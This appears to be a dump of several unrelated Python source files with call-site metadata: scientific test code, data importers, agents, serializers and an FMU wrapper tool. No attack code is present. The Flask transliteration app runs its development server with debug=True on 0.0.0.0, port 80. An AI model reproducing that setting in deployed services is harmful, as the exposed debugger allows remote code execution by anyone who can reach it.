print("Packet Sent ", i)
i=i+1 | [] |
azagajewski/ColiCoords | test/test_basic_functions.py | fa26e46971e24ff582c4d33331c5b8181f605c9f | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
#todo check order
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
if __name__ == '__main__':
unittest.main() | [((66, 4, 66, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((11, 20, 11, 40), 'test.test_functions.load_testdata', 'load_testdata', ({(11, 34, 11, 39): '"""ds1"""'}, {}), "('ds1')", False, 'from test.test_functions import load_testdata\n'), ((32, 20, 32, 92), 'colicoords.preprocess.data_to_cells', 'data_to_cells', (), '', False, 'from colicoords.preprocess import data_to_cells\n'), ((34, 20, 34, 92), 'colicoords.preprocess.data_to_cells', 'data_to_cells', (), '', False, 'from colicoords.preprocess import data_to_cells\n'), ((40, 13, 40, 32), 'colicoords.cell.CellList', 'CellList', ({(40, 22, 40, 31): 'cell_list'}, {}), '(cell_list)', False, 'from colicoords.cell import Cell, CellList\n'), ((57, 15, 57, 35), 'test.test_functions.load_testdata', 'load_testdata', ({(57, 29, 57, 34): '"""ds1"""'}, {}), "('ds1')", False, 'from test.test_functions import load_testdata\n'), ((58, 25, 58, 44), 'colicoords.preprocess.data_to_cells', 'data_to_cells', ({(58, 39, 58, 43): 'data'}, {}), '(data)', False, 'from colicoords.preprocess import data_to_cells\n'), ((31, 14, 31, 36), 'hashlib.md5', 'hashlib.md5', ({(31, 26, 31, 35): 'self.data'}, {}), '(self.data)', False, 'import hashlib\n'), ((33, 14, 33, 36), 'hashlib.md5', 'hashlib.md5', ({(33, 26, 33, 35): 'self.data'}, {}), '(self.data)', False, 'import hashlib\n'), ((35, 14, 35, 36), 'hashlib.md5', 'hashlib.md5', ({(35, 26, 35, 35): 'self.data'}, {}), '(self.data)', False, 'import hashlib\n')] |
supsi-dacd-isaac/oasi-ozone-forecaster | data_importer_ftp.py | 01d23c374e857dcc6d556d073c0380186c2934d2 | # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| [((20, 19, 20, 43), 'classes.alerts.SlackClient', 'SlackClient', ({(20, 31, 20, 37): 'logger', (20, 39, 20, 42): 'cfg'}, {}), '(logger, cfg)', False, 'from classes.alerts import SlackClient\n'), ((36, 17, 36, 42), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((58, 13, 58, 32), 'logging.getLogger', 'logging.getLogger', ({}, {}), '()', False, 'import logging\n'), ((59, 4, 60, 42), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((80, 9, 80, 48), 'classes.data_manager.DataManager', 'DataManager', ({(80, 21, 80, 34): 'influx_client', (80, 36, 80, 39): 'cfg', (80, 41, 80, 47): 'logger'}, {}), '(influx_client, cfg, logger)', False, 'from classes.data_manager import DataManager\n'), ((42, 7, 42, 34), 'os.path.isfile', 'os.path.isfile', ({(42, 22, 42, 33): 'config_file'}, {}), '(config_file)', False, 'import os\n'), ((44, 8, 44, 19), 'sys.exit', 'sys.exit', ({(44, 17, 44, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((72, 24, 74, 104), 'influxdb.InfluxDBClient', 'InfluxDBClient', (), '', False, 'from influxdb import InfluxDBClient\n'), ((77, 8, 77, 19), 'sys.exit', 'sys.exit', ({(77, 17, 77, 18): '(3)'}, {}), '(3)', False, 'import sys\n')] |
gil9red/SimplePyScripts | autoindent_code_JASS_war3map_j.py | c191ce08fbdeb29377639184579e392057945154 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| [((17, 11, 17, 55), 're.sub', 're.sub', ({(17, 18, 17, 37): '"""".+?"(\\\\+".+?")+ """', (17, 39, 17, 48): '_on_match', (17, 50, 17, 54): 'text'}, {}), '(\'".+?"(\\\\+".+?")+ \', _on_match, text)', False, 'import re\n')] |
TruX-DTF/fixminer_source | python/addNewData.py | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
matches =loadPairMulti(root,'','shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
for subgraph in networkx.connected_component_subgraphs(g):
logging.info('Cluster size %d',len(subgraph.nodes()))
cluster.append(subgraph.nodes())
cluster
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
indexFile =join(pairsPath, root, s,action,token+'.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| [((24, 14, 24, 26), 'pairs.shapePairs', 'shapePairs', ({}, {}), '()', False, 'from pairs import shapePairs\n'), ((28, 4, 28, 24), 'pairs.createPairs', 'createPairs', ({(28, 16, 28, 23): 'matches'}, {}), '(matches)', False, 'from pairs import createPairs\n'), ((31, 4, 31, 17), 'pairs.importShape', 'importShape', ({}, {}), '()', False, 'from pairs import importShape\n'), ((88, 8, 88, 33), 'networkx.Graph', 'networkx.Graph', ({(88, 23, 88, 32): 'col_combi'}, {}), '(col_combi)', False, 'import networkx\n'), ((90, 20, 90, 61), 'networkx.connected_component_subgraphs', 'networkx.connected_component_subgraphs', ({(90, 59, 90, 60): 'g'}, {}), '(g)', False, 'import networkx\n'), ((77, 17, 77, 48), 'abstractPatch.loadPairMulti', 'loadPairMulti', ({(77, 31, 77, 35): 'root', (77, 36, 77, 38): '""""""', (77, 39, 77, 47): '"""shapes"""'}, {}), "(root, '', 'shapes')", False, 'from abstractPatch import loadPairMulti\n')] |
aosjehdgus/transliteration | app.py | 1934999385863009cdf9f8806e949157d653a9f4 | # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Flask 객체 선언, 파라미터로 어플리케이션 패키지의 이름을 넣어 준다.
app.config['JSON_AS_ASCII'] = False # 한글 데이터 전송을 위해서 설정해 준다.
@app.route("/transliterate", methods=['GET'])
def transliterate():
input = request.args.get('input')
output = transliteration.run(input)
learned = transliteration.is_learned(input)
print(input, learned)
return jsonify(output)
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| [((10, 18, 10, 35), 'translate.Transliteration', 'Transliteration', ({}, {}), '()', False, 'from translate import Transliteration\n'), ((12, 6, 12, 21), 'flask.Flask', 'Flask', ({(12, 12, 12, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, request, jsonify\n'), ((18, 10, 18, 35), 'flask.request.args.get', 'request.args.get', ({(18, 27, 18, 34): '"""input"""'}, {}), "('input')", False, 'from flask import Flask, request, jsonify\n'), ((23, 9, 23, 24), 'flask.jsonify', 'jsonify', ({(23, 17, 23, 23): 'output'}, {}), '(output)', False, 'from flask import Flask, request, jsonify\n')] |
mental689/pyano | pyano2/apps.py | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | from django.apps import AppConfig
class Pyano2Config(AppConfig):
name = 'pyano2'
| [] |
cbeall123/E3SM | cime/scripts/lib/CIME/XML/env_build.py | ec32b40d549b292f14acd11e6774686564539d3c | """
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema)
| [((17, 8, 17, 64), 'CIME.XML.env_base.EnvBase.__init__', 'EnvBase.__init__', (), '', False, 'from CIME.XML.env_base import EnvBase\n')] |
gnmerritt/volttron | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads volttron.log file size every hour,
compute the size delta from previous hour and publish the difference
with timestamp. It also publishes standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes file's size increment in previous time interval (60 minutes)
with timestamp.
Also publishes standard deviation of file's hourly size differences
every 24 hour.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| [((49, 0, 49, 21), 'volttron.platform.agent.utils.setup_logging', 'utils.setup_logging', ({}, {}), '()', False, 'from volttron.platform.agent import utils\n'), ((50, 7, 50, 34), 'logging.getLogger', 'logging.getLogger', ({(50, 25, 50, 33): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((64, 13, 64, 43), 'volttron.platform.agent.utils.load_config', 'utils.load_config', ({(64, 31, 64, 42): 'config_path'}, {}), '(config_path)', False, 'from volttron.platform.agent import utils\n'), ((97, 5, 97, 29), 'volttron.platform.vip.agent.Core.receiver', 'Core.receiver', ({(97, 19, 97, 28): '"""onstart"""'}, {}), "('onstart')", False, 'from volttron.platform.vip.agent import Agent, RPC, Core\n'), ((166, 4, 166, 74), 'volttron.platform.agent.utils.vip_main', 'utils.vip_main', (), '', False, 'from volttron.platform.agent import utils\n'), ((150, 14, 150, 33), 'volttron.platform.agent.utils.get_aware_utc_now', 'get_aware_utc_now', ({}, {}), '()', False, 'from volttron.platform.agent.utils import get_aware_utc_now\n'), ((151, 33, 152, 47), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((159, 19, 159, 50), 'os.path.getsize', 'os.path.getsize', ({(159, 35, 159, 49): 'self.file_path'}, {}), '(self.file_path)', False, 'import os\n'), ((133, 37, 133, 75), 'statistics.stdev', 'statistics.stdev', ({(133, 54, 133, 74): 'self.size_delta_list'}, {}), '(self.size_delta_list)', False, 'import statistics\n'), ((125, 31, 125, 57), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ({}, {}), '()', False, 'import datetime\n'), ((127, 44, 127, 70), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ({}, {}), '()', False, 'import datetime\n')] |
sseits-skku/its-backend | apps/inventory/serializers.py | faf020568b930aaff4958d47602c511aad8a6c8e | from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
class PlaceSerializer(ModelSerializer):
class Meta:
model = Place
fields = '__all__'
class StatusSerializer(ModelSerializer):
class Meta:
model = Status
fields = '__all__'
class OSTypeSerializer(ModelSerializer):
class Meta:
model = OSType
fields = '__all__'
class StockSerializer(ModelSerializer):
class Meta:
model = Stock
fields = '__all__'
class ComputerStockSerializer(ModelSerializer):
class Meta:
model = ComputerStock
fields = '__all__'
| [] |
CSchulzeTLK/FMPy | fmpy/cswrapper/__init__.py | fde192346c36eb69dbaca60a96e80cdc8ef37b89 |
def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, os.path.relpath(path, base_path))
| [((13, 24, 13, 56), 'fmpy.read_model_description', 'read_model_description', ({(13, 47, 13, 55): 'filename'}, {}), '(filename)', False, 'from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__\n'), ((21, 15, 21, 32), 'fmpy.extract', 'extract', ({(21, 23, 21, 31): 'filename'}, {}), '(filename)', False, 'from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__\n'), ((23, 10, 23, 56), 'os.path.join', 'os.path.join', ({(23, 23, 23, 31): 'unzipdir', (23, 33, 23, 55): '"""modelDescription.xml"""'}, {}), "(unzipdir, 'modelDescription.xml')", False, 'import os\n'), ((25, 11, 25, 27), 'lxml.etree.parse', 'etree.parse', ({(25, 23, 25, 26): 'xml'}, {}), '(xml)', False, 'from lxml import etree\n'), ((45, 8, 45, 37), 'lxml.etree.Element', 'etree.Element', ({(45, 22, 45, 36): '"""CoSimulation"""'}, {}), "('CoSimulation')", False, 'from lxml import etree\n'), ((54, 19, 54, 70), 'os.path.join', 'os.path.join', ({(54, 32, 54, 40): 'unzipdir', (54, 42, 54, 57): '"""documentation"""', (54, 59, 54, 69): '"""licenses"""'}, {}), "(unzipdir, 'documentation', 'licenses')", False, 'import os\n'), ((64, 4, 64, 40), 'shutil.rmtree', 'rmtree', (), '', False, 'from shutil import copyfile, rmtree\n'), ((51, 34, 51, 59), 'os.path.dirname', 'os.path.dirname', ({(51, 50, 51, 58): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((52, 32, 52, 57), 'os.path.dirname', 'os.path.dirname', ({(52, 48, 52, 56): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((56, 11, 56, 38), 'os.path.isdir', 'os.path.isdir', ({(56, 25, 56, 37): 'licenses_dir'}, {}), '(licenses_dir)', False, 'import os\n'), ((57, 8, 57, 30), 'os.mkdir', 'os.mkdir', ({(57, 17, 57, 29): 'licenses_dir'}, {}), '(licenses_dir)', False, 'import os\n'), ((60, 27, 60, 100), 'os.path.join', 'os.path.join', ({(60, 40, 60, 48): 'unzipdir', (60, 50, 60, 65): '"""documentation"""', (60, 67, 60, 77): '"""licenses"""', (60, 79, 60, 99): '"""fmpy-cswrapper.txt"""'}, {}), "(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt')", False, 'import os\n'), ((72, 9, 72, 61), 